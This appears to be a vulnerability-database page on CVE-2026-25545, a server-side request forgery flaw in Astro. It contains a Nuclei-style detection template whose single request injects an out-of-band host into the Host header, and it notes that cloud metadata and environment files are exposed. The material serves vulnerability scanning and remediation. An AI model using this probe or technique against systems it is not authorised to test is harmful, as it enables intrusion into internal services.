| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-25545 | 23 Feb 202613:07 | – | circl | |
| Astro 代码问题漏洞 | 24 Feb 202600:00 | – | cnnvd | |
| CVE-2026-25545 | 24 Feb 202600:37 | – | cve | |
| CVE-2026-25545 Astro has Full-Read SSRF in error rendering via Host: header injection | 24 Feb 202600:37 | – | cvelist | |
| EUVD-2026-7455 | 24 Feb 202600:37 | – | euvd | |
| Astro has Full-Read SSRF in error rendering via Host: header injection | 23 Feb 202621:54 | – | github | |
| CVE-2026-25545 | 24 Feb 202601:16 | – | nvd | |
| CVE-2026-25545 Astro has Full-Read SSRF in error rendering via Host: header injection | 24 Feb 202600:37 | – | osv | |
| GHSA-QQ67-MVV5-FW3G Astro has Full-Read SSRF in error rendering via Host: header injection | 23 Feb 202621:54 | – | osv | |
| PT-2026-21546 | 23 Feb 202600:00 | – | ptsecurity |
id: CVE-2026-25545
info:
name: Astro SSR - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
Astro before 5.17.3 and @astrojs/node before 9.5.4 are vulnerable to full-read SSRF due to improper Host header validation in error page rendering, allowing attackers to redirect requests and access internal resources.
impact: |
Full-read SSRF allowing access to internal services, cloud metadata endpoints (AWS/GCP/Azure IMDS), environment files, and any host reachable from the server.
remediation: |
Upgrade to astro >= 5.17.3 or @astrojs/node >= 9.5.4. The fix reads prerendered error files directly from disk and validates the Host: header the same way X-Forwarded-Host was already validated.
reference:
- https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g
- https://github.com/withastro/astro/pull/15473
- https://nvd.nist.gov/vuln/detail/CVE-2026-25545
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2026-25545
epss-score: 0.01414
epss-percentile: 0.69494
cwe-id: CWE-918
metadata:
verified: true
max-request: 1
vendor: astro
product: astro
shodan-query: http.component:"Astro"
tags: cve,cve2026,astro,ssrf
http:
- method: GET
path:
- "{{BaseURL}}/{{randstr}}"
headers:
Host: "oast.me"
matchers:
- type: dsl
dsl:
- 'contains(body, "<html><head></head><body></body></html>")'
- 'contains(header, "X-Interactsh-Version")'
- 'status_code == 404'
condition: and
# digest: 4a0a004730450220037e4aac2e48b062c82e27aaae0510cd98ba6325a6e6b9590a6c4f021c201b2f022100db4df56fb0786513103910fb45bddc200afc624771d0bd9371a7de584a150fc6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation